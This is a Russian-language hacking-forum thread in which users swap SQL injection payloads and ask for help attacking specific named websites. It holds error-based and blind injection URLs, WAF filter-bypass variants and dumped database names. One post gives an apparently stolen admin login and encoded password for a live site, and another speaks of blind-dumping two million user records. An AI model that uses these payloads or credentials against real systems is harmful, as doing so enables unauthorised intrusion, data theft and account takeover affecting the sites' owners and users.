Code: http://medtechservice.am/index.php?mod=pages&act=show&menu_id=159+and+(Select+1+From+(Select+count(0),concat((Select+version()),floor(rand(0)*2))+From+menus+Group+By+2)a)
http://www.soulmades.com.au/index.php?ap=2956775%20AND%20ascii%28substring%28%28database%28%29%29,15,1%29%29=115 database - mades_soulmades +там 4'тая ветка
Translate!!!!! Всем приятного времени сутак ) Сразу к делу .. Черес уязвимост получил логин и парол админа но когда пробую заити как админ говарит што парол/логин непатходит... Вот сам сайт :ww_w.zhengazeta.by/magia_gadania/category/89 Login: admin Pw : eXoyMDA4 Настораживает присутствие в сочетание пароля (MDA)... возможна ветом проблема ? Вопчем уже не первый раз такое , посоветуйте как распознавать разные типы паролей если они зашифрованы ... или что именно не пускает зайти Силна не пинайте .. спс
Как здесь можно обойти фильтрацию? http://www.vino-concept.ch/content.php?id=-30+union+select+1,2,3,4,5,6,7,8,9,10+frfromom+information_schema.tables+--+
http://***/view.php?abc=1version()&def=ghi FUNCTION ttt.1version does not exist view.php?abc=1version0&def=ghi Unknown column '1version0' in 'where clause' что делать?) единицу нельзя убрать в переди)
нет так тоже пробовал. делаю запрос Code: http://xxx/xxx.php?abc=1%version()&def=ghi получаю в исходном коде : Code: <input type="hidden" name="id" value="1%version()"> Code: 1/**/OR/*d*/user=root Unknown column 'user' in 'where clause' Code: 1/**/OR/*d*/author=id <input type="hidden" name="id" value="1/**/OR/*d*/author=id"> не пойму P.S урл дать не могу сайт почти копия milw0rm.com всем спасибо сам разобрался: +and(select%201%20from(select%20count(*),concat(user(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)--&
а дальше как ?? http://medtechservice.am/index.php?mod=pages&act=show&menu_id=159+and+(Select+1+From+(Select+count(0),concat((Select+/*!table_name*/),floor(rand(0)*2))+From+/*!information_schema.tables*/+Group+By+2)a) не получается.. http://medtechservice.am/index.php?mod=pages&act=show&menu_id=159+and+(Select+1+From+(Select+count(0),concat((Select+Table_name),floor(rand(0)*2))+From+Information_Schema.Tables+Group+By+2)a) и так не получается.. http://medtechservice.am/index.php?mod=pages&act=show&menu_id=159+and+(Select+1+From+(Select+count(0),concat((Select+tAbLe_NamE),floor(rand(0)*2))+From+iNfOrMation_SchemA.tAblEs+Group+By+2)a) и так..
Feldmarschall, что 4 ветка я знаю, даже знаю имя таблицы где лежат данные юзеров. тянуть 2 ляма юзеров слепым это жесть
"UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12 from INFORMATION_SCHEMA.tables # You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12 from INFORMATION_SCHEMA.tables #"' at line 1 ----------------------------------------------------------------- А если "UNION SELECT 1,2,3,4,5,6,7,8,9,10,11 from INFORMATION_SCHEMA.tables # то The used SELECT statements have a different number of columns
